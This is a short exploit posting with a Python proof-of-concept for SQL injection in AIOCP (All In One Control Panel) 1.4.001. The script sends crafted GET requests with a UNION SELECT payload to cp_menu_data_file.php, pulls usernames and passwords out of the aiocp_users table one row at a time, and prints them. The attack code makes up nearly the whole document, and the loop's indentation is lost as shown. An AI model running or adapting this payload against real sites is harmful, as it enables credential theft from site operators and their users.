AIOCP (All In One Control Panel) version 1.4.001 remote SQL injection exploit.
2cfeca1d1569e62cc86cd3db7d5dd59073de3ab84769e38004535af3eb0d0ac5
# ------------------------------------------------------------------------
# Software................AIOCP (All In One Control Panel) 1.4.001
# Vulnerability...........SQL Injection
# Download................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=aiocp
# Release Date............1/31/2011
# Tested On...............Windows 7 + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# ------------------------------------------------------------------------
#
# --PoC--
import re, socket
host = 'localhost'
port = 80
r = re.compile('\'([^\']+):([^\s]+)\sLIMIT')
# Search user ids 0 through 16
for i in range(0,16):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send("GET /AIOCP/public/code/cp_menu_data_file.php?menu='or%201=1%20UNION%20ALL%20SELECT%201,0,CONCAT(',',user_name,':',user_password)%20as%20menulst_name,0%20FROM%20aiocp_users%20ORDER%20BY%20menulst_style%20LIMIT%20" + str(i) + ",1;%23 HTTP/1.1\r\n"
'Host: ' + host + '\r\n'
'\r\n')
resp = s.recv(8192)
m = r.search(resp)
if m is None: continue
print 'Username: ' + m.group(1) + '\nPassword: ' + m.group(2) + '\n'